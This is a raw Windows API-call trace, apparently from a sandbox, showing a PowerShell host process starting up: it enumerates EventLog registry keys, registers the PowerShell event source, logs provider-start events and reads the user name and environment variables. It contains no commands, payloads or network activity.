	[0517.612] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.612] CoTaskMemFree (pv=0x1b959c50) 
	[0517.612] CoTaskMemFree (pv=0x0) 
	[0517.612] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.612] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.612] CoTaskMemFree (pv=0x1b959c50) 
	[0517.612] CoTaskMemFree (pv=0x0) 
	[0517.612] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x348) returned 0x0
	[0517.612] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.612] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x34c) returned 0x0
	[0517.613] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.613] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x350) returned 0x0
	[0517.613] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.613] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x354) returned 0x0
	[0517.613] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.613] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x358) returned 0x0
	[0517.613] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.613] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x35c) returned 0x0
	[0517.613] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.614] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x360) returned 0x0
	[0517.614] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.614] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x364) returned 0x0
	[0517.614] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.614] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x368) returned 0x0
	[0517.614] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x36c) returned 0x0
	[0517.614] RegCloseKey (hKey=0x36c) returned 0x0
	[0517.614] RegCloseKey (hKey=0x344) returned 0x0
	[0517.615] RegCloseKey (hKey=0x368) returned 0x0
	[0517.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x368) returned 0x0
	[0517.616] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.616] CoTaskMemFree (pv=0x0) 
	[0517.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.616] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.616] CoTaskMemFree (pv=0x1b959c50) 
	[0517.616] CoTaskMemFree (pv=0x0) 
	[0517.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.616] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.616] CoTaskMemFree (pv=0x1b959c50) 
	[0517.616] CoTaskMemFree (pv=0x0) 
	[0517.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.616] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.617] CoTaskMemFree (pv=0x1b959c50) 
	[0517.617] CoTaskMemFree (pv=0x0) 
	[0517.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.617] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.617] CoTaskMemFree (pv=0x1b959c50) 
	[0517.617] CoTaskMemFree (pv=0x0) 
	[0517.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.617] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.617] CoTaskMemFree (pv=0x1b959c50) 
	[0517.617] CoTaskMemFree (pv=0x0) 
	[0517.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.617] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.617] CoTaskMemFree (pv=0x1b959c50) 
	[0517.617] CoTaskMemFree (pv=0x0) 
	[0517.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.617] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.618] CoTaskMemFree (pv=0x1b959c50) 
	[0517.618] CoTaskMemFree (pv=0x0) 
	[0517.618] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.618] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.618] CoTaskMemFree (pv=0x1b959c50) 
	[0517.618] CoTaskMemFree (pv=0x0) 
	[0517.618] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.618] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.618] CoTaskMemFree (pv=0x1b959c50) 
	[0517.618] CoTaskMemFree (pv=0x0) 
	[0517.618] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x344) returned 0x0
	[0517.618] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.618] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x36c) returned 0x0
	[0517.618] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.619] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x370) returned 0x0
	[0517.619] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.619] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x374) returned 0x0
	[0517.619] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.619] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x378) returned 0x0
	[0517.619] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.619] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x37c) returned 0x0
	[0517.619] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.619] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x380) returned 0x0
	[0517.620] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.620] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x384) returned 0x0
	[0517.620] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x0) returned 0x2
	[0517.620] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x388) returned 0x0
	[0517.620] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d268 | out: phkResult=0x14d268*=0x38c) returned 0x0
	[0517.620] RegCloseKey (hKey=0x38c) returned 0x0
	[0517.620] RegCloseKey (hKey=0x368) returned 0x0
	[0517.621] RegCloseKey (hKey=0x388) returned 0x0
	[0517.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x388) returned 0x0
	[0517.622] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d14c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d148*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.622] CoTaskMemFree (pv=0x0) 
	[0517.622] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.622] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.622] CoTaskMemFree (pv=0x1b959c50) 
	[0517.622] CoTaskMemFree (pv=0x0) 
	[0517.622] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.622] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.622] CoTaskMemFree (pv=0x1b959c50) 
	[0517.622] CoTaskMemFree (pv=0x0) 
	[0517.622] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.622] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.622] CoTaskMemFree (pv=0x1b959c50) 
	[0517.622] CoTaskMemFree (pv=0x0) 
	[0517.622] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.622] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.622] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.623] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.623] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.623] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.623] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.623] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.623] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.623] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.623] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.623] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x1b959c50, lpcchName=0x14d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.623] CoTaskMemFree (pv=0x1b959c50) 
	[0517.623] CoTaskMemFree (pv=0x0) 
	[0517.623] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x368) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.624] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x38c) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.624] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x390) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.624] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x394) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.624] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x398) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.624] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x39c) returned 0x0
	[0517.624] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.625] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x3a0) returned 0x0
	[0517.625] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.625] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x3a4) returned 0x0
	[0517.625] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x0) returned 0x2
	[0517.625] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x3a8) returned 0x0
	[0517.625] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d238 | out: phkResult=0x14d238*=0x3ac) returned 0x0
	[0517.625] RegCloseKey (hKey=0x3ac) returned 0x0
	[0517.625] RegCloseKey (hKey=0x388) returned 0x0
	[0517.626] RegCloseKey (hKey=0x3a8) returned 0x0
	[0519.627] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba50008
	[0521.150] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d2be20*="WSMan", lpRawData=0x2d2bb90) returned 1
	[0521.151] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.151] CoTaskMemFree (pv=0x3ad740) 
	[0521.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.154] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0521.154] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0521.154] CoTaskMemFree (pv=0x1b974f30) 
	[0521.154] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0521.154] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0521.154] CoTaskMemFree (pv=0x1b964a00) 
	[0521.155] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d31358*="Alias", lpRawData=0x2d310e8) returned 1
	[0521.156] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.156] CoTaskMemFree (pv=0x3ad740) 
	[0521.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.158] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0521.158] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0521.159] CoTaskMemFree (pv=0x1b974f30) 
	[0521.159] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0521.159] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0521.159] CoTaskMemFree (pv=0x1b964a00) 
	[0521.159] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d36950*="Environment", lpRawData=0x2d366e0) returned 1
	[0521.161] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.161] CoTaskMemFree (pv=0x3ad740) 
	[0521.162] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.162] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0521.162] CoTaskMemFree (pv=0x3ad740) 
	[0521.162] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
